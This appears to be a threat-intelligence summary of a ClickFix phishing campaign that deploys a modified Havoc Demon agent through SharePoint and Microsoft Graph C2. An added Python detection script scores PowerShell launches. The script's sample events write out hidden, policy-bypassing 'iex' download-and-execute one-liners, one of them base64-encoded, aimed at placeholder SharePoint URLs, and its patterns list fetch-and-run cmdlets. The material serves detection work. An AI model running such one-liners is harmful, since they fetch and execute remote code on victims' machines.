A phishing campaign combines the ClickFix social-engineering technique with multi-stage malware to deploy a modified Havoc Demon agent. The attack starts with an HTML attachment that uses ClickFix to trick the user into pasting and running a malicious PowerShell command. The later stages are hosted on SharePoint sites, and the modified Havoc Demon routes its C2 traffic through the Microsoft Graph API so that it is hidden among legitimate Microsoft 365 traffic. The chain includes sandbox evasion, a Python shellcode loader, KaynLdr for reflective DLL loading, and a customised Havoc Demon DLL. For C2 the implant creates two files in SharePoint, encrypts the exchanged data with AES-256, and supports a range of operator commands. The campaign shows how trusted public services are combined with modified open-source tooling to evade detection.
Author: AlienVault
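The first hop in the chain above, a user pasting a PowerShell one-liner that pulls the next stage from SharePoint, is also the cheapest place to detect it. The script below is an added example written for this page, not code from the pulse, its author, or the Havoc project. It scores process-creation events (the fields Sysmon Event ID 1 or Windows 4688 provide) for the hallmarks of a ClickFix launch: a PowerShell child of explorer.exe (the Run dialog), a hidden window, an execution-policy bypass, an -EncodedCommand payload (decoded as UTF-16LE and scanned too), a download-and-execute cmdlet, and a sharepoint.com URL. The sample events, the "example" tenant names, the weights and the alert threshold are all constructed assumptions, not telemetry or indicators from the campaign.

```python
"""Heuristic triage of ClickFix-style PowerShell launches that fetch a stage
from SharePoint. Added example; sample events below are constructed."""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class ProcessEvent:
    """Minimal process-creation record (Sysmon EID 1 / Windows 4688 fields)."""
    parent_image: str
    image: str
    command_line: str


# Hallmark patterns. Weights and threshold are assumptions for this example,
# not a published detection rule.
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
BYPASS_RE = re.compile(r"-e(?:p|x[a-z]*)\s+bypass", re.I)
ENCODED_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
FETCH_EXEC_RE = re.compile(
    r"\b(?:iex|invoke-expression|downloadstring|downloadfile|"
    r"invoke-webrequest|iwr|invoke-restmethod|irm)\b", re.I)
SHAREPOINT_RE = re.compile(r"https?://[a-z0-9.-]+\.sharepoint\.com/\S*", re.I)
ALERT_THRESHOLD = 4


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Recover the script behind -EncodedCommand (or an accepted abbreviation).
    PowerShell expects base64 of the UTF-16LE script; anything else is ignored."""
    m = ENCODED_RE.search(command_line)
    if m is None:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def encode_command(script: str) -> str:
    """Inverse of decode_encoded_command; used only to build a sample event."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def score_event(ev: ProcessEvent) -> Tuple[int, List[str]]:
    """Return (score, findings) for one event; non-PowerShell images score 0."""
    if basename(ev.image) not in {"powershell.exe", "pwsh.exe"}:
        return 0, []
    findings: List[Tuple[str, int]] = []
    text = ev.command_line
    decoded = decode_encoded_command(text)
    if decoded is not None:
        findings.append(("-EncodedCommand payload: " + decoded[:50], 1))
        text = text + "\n" + decoded  # scan the decoded script as well
    if basename(ev.parent_image) == "explorer.exe":
        findings.append(("spawned by explorer.exe (Run dialog, as ClickFix instructs)", 1))
    if HIDDEN_RE.search(text):
        findings.append(("hidden window", 1))
    if BYPASS_RE.search(text):
        findings.append(("execution policy bypass", 1))
    if FETCH_EXEC_RE.search(text):
        findings.append(("download-and-execute cmdlet", 2))
    m = SHAREPOINT_RE.search(text)
    if m:
        findings.append(("next stage fetched from SharePoint: " + m.group(0).strip("'\")"), 1))
    return sum(w for _, w in findings), [f for f, _ in findings]


def triage(events: List[ProcessEvent]) -> List[Tuple[ProcessEvent, int, List[str]]]:
    """Events at or above ALERT_THRESHOLD, highest score first."""
    hits = []
    for ev in events:
        score, findings = score_event(ev)
        if score >= ALERT_THRESHOLD:
            hits.append((ev, score, findings))
    return sorted(hits, key=lambda h: h[1], reverse=True)


PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
# Constructed sample events; "example" tenants are placeholders, not IOCs.
SAMPLE_EVENTS = [
    ProcessEvent("C:\\Windows\\explorer.exe", PS,
                 "powershell.exe -w hidden -ep bypass -c \"iex (iwr "
                 "'https://example-my.sharepoint.com/personal/u/Documents/stage1.txt'"
                 " -UseBasicParsing).Content\""),
    ProcessEvent("C:\\Windows\\explorer.exe", PS,
                 "powershell.exe -nop -w hidden -enc " + encode_command(
                     "iex (New-Object Net.WebClient).DownloadString("
                     "'https://example.sharepoint.com/sites/ops/Shared Documents/s1.ps1')")),
    ProcessEvent("C:\\Windows\\System32\\cmd.exe", PS,
                 "powershell.exe -File C:\\scripts\\backup.ps1"),
    ProcessEvent("C:\\Windows\\System32\\cmd.exe", "C:\\Program Files\\PowerShell\\7\\pwsh.exe",
                 "pwsh.exe -Command \"Connect-PnPOnline -Url "
                 "https://example.sharepoint.com/sites/it -Interactive\""),
]

if __name__ == "__main__":
    for ev, score, findings in triage(SAMPLE_EVENTS):
        print(f"score={score} cmd={ev.command_line[:70]}")
        for f in findings:
            print("  -", f)
```

The benign admin session that also touches sharepoint.com stays below the threshold because a single indicator is not enough; it is the combination of a Run-dialog parent, a hidden window and a download-and-execute cmdlet that characterises ClickFix. In production this logic would sit on a SIEM query over real process telemetry rather than an in-memory list.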
Related Tags:
havoc demon agent
KaynLdr
clickfix
T1558
T1059.006
T1566.001
T1021.002
havoc
T1059.001
Associated Indicators (SHA-256 file hashes):
989F58C86343704F143C0D9E16893FAD98843B932740B113E8B2F8376859D2DD
CC151456CF7DF7FF43113E5F82C4CE89434AB40E68CD6FB362E4AE4F70CE65B3